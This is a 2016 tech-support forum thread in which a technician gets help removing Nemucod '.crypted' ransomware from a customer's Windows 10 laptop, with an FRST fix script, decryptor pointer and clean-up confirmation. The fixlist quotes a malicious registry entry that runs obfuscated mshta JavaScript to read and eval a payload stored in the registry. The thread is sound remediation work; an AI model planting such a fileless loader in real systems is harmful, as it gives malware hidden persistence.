Cryptolocker Infection, please advise.

Hello,

 

A customer just brought a computer to my attention; this is her home laptop, and she found all of her documents renamed to *.crypted, so mydocument.docx becomes mydocument.docx.crypted.

 

I tried renaming a file, as I found some references to "bluffware", but this did not work.

 

The ransom note was found on the laptops' desktop. I think the "3 day deadline" mentioned in the note is gone by, so I do not actually expect to recover data, just to get back to a clean system.

 

I've quarantined the laptop, and have not run any tools on it. It does have an active McAfee subscription, and it appears that it has detected nothing.

 

I can submit sample documents if it helps the cause!

 

How should I proceed with this system? The system is running Windows 10.

 

Thanks in advance!

 

--Jon

 

--Edit: Adding FRST log files

Edited by CoastalData, 30 December 2016 - 03:09 PM.

I see that I've posted this in the wrong place, as there is a forum just for Ransomware. Can this post be moved, or should I repost, or leave as is?

 

Over in the other forum, I used "ID Ransomware" and it produced this:

 

 

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Stay with this topic.

Execute the instructions on the

Decryptor Released for the Nemucod Trojan's .CRYPTED Ransomware

Hope you can get some of your files back in service.

===

When finished, run this fix.

Press the windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.

Please copy the entire contents of the code box below to a new file.
 

Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

(© 2015 Microsoft Corporation) C:\Users\karin\AppData\Local\Microsoft\BingSvc\BingSvc.exe
HKU\S-1-5-21-1038720155-2742960210-2465242774-1001\...\Run: [BingSvc] => C:\Users\karin\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-1038720155-2742960210-2465242774-1001\...\Run: [Crypted] => C:\Users\karin\AppData\Local\Temp\a.txt [1353 2016-10-04] () <===== ATTENTION
Startup: C:\Users\karin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\317b9.lnk [2016-10-19]
ShortcutTarget: 317b9.lnk ->  (No File)
Startup: C:\Users\karin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8b2ec.lnk [2016-10-19]
ShortcutTarget: 8b2ec.lnk ->  (No File)
CHR Extension: (Bing) - C:\Users\karin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcfenmboojpjinhpgggodefccipikbpd [2016-09-05]
CHR Extension: (Chrome Web Store Payments) - C:\Users\karin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-04]
CHR Extension: (Chrome Media Router) - C:\Users\karin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-30]
CHR HKU\S-1-5-21-1038720155-2742960210-2465242774-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
HKU\S-1-5-21-1038720155-2742960210-2465242774-1001\Software\Classes\bb920: "C:\WINDOWS\system32\mshta.exe" "javascript:M6PHvy1C="tot";Hn35=new ActiveXObject("WScript.Shell");OSPYE7v="ww3l5v";I0vs2z=Hn35.RegRead("HKCU\\software\\aesi\\pbvkrllx");WysS67J="9vbaeu";eval(I0vs2z);SZ7XrV4="rYe";" <===== ATTENTION
C:\Users\karin\AppData\Local\Microsoft\BingSvc\BingSvc.exe
C:\Users\karin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\317b9.lnk
C:\Users\karin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8b2ec.lnk

Reboot:

End

Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.

Please let me know what problem persists with this computer.
===

ADOBE SHOCKWARE

Navigate to this page and follow the instructions to get the latest version.
https://www.adobe.com/shockwave/welcome/

Remove this old version if still present via the Control Panel > Programs > Programs and Features.
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.9.159 - Adobe Systems, Inc.)

Edited by nasdaq, 31 December 2016 - 10:18 AM.

Hello,

 

I've got the fix script all setup and ready to go, but I've been spinning my wheels trying to get a file to decrypt; I've found a few pairs of files, encrypted and non-encrypted, but none of them are working for me. Not sure if I should keep on trying, maybe reach out to Emsisoft about the decrypter, and/or continue on with the fix?

 

It shouldn't matter if we go ahead and continue fixing the computer now, right? I could still work with decrypting after, I would think, right?

 

Thoughts?

 

--Jon

You may have a new version.

Go to the end of this topic.

https://www.bleepingcomputer.com/forums/t/608045/nemucod-ransomware-crypted-decrypttxt-support-help-topic/page-36

Ask for help. You may be requeted to submit a good and bad files.

==

p.s.
not sure about you running my fix just yet.

This key is problematic.
Not sure what the Javascrip is performing. It may be a good thing to remove it but I'm not sure if I should just yet.
HKU\S-1-5-21-1038720155-2742960210-2465242774-1001\Software\Classes\bb920: "C:\WINDOWS\system32\mshta.exe" "javascript:M6PHvy1C="tot";Hn35=new ActiveXObject("WScript.Shell");OSPYE7v="ww3l5v";I0vs2z=Hn35.RegRead("HKCU\\software\\aesi\\pbvkrllx");WysS67J="9vbaeu";eval(I0vs2z);SZ7XrV4="rYe";" <===== ATTENTION

Okay! I just got a working decryption key, I'm going to get her documents cleared up, and then I'll be ready to proceed.

 

The problematic key above, did you want me to remove that from the script, or are we good to go after decrypting?

 

Thanks so much for your help!

 

--Jon

When ready to proceed and after having restarted the computer run the fix as I have suggested.

Okay, the fix has run as suggested, and the computer has rebooted. Do you need new FRST logs?

Why not just be be sure all is well.

Awesome, here they are.

 

Thanks!

All clean.

ADOBE SHOCKWARE

Navigate to this page and follow the instructions and get the latest version.
https://www.adobe.com/shockwave/welcome/

Remove this old version via the Control Panel > Programs > Programs and Features.
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.9.159 - Adobe Systems, Inc.)
===

If all is well.

To learn more about how to protect yourself while on the internet read this little guide best security practices keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/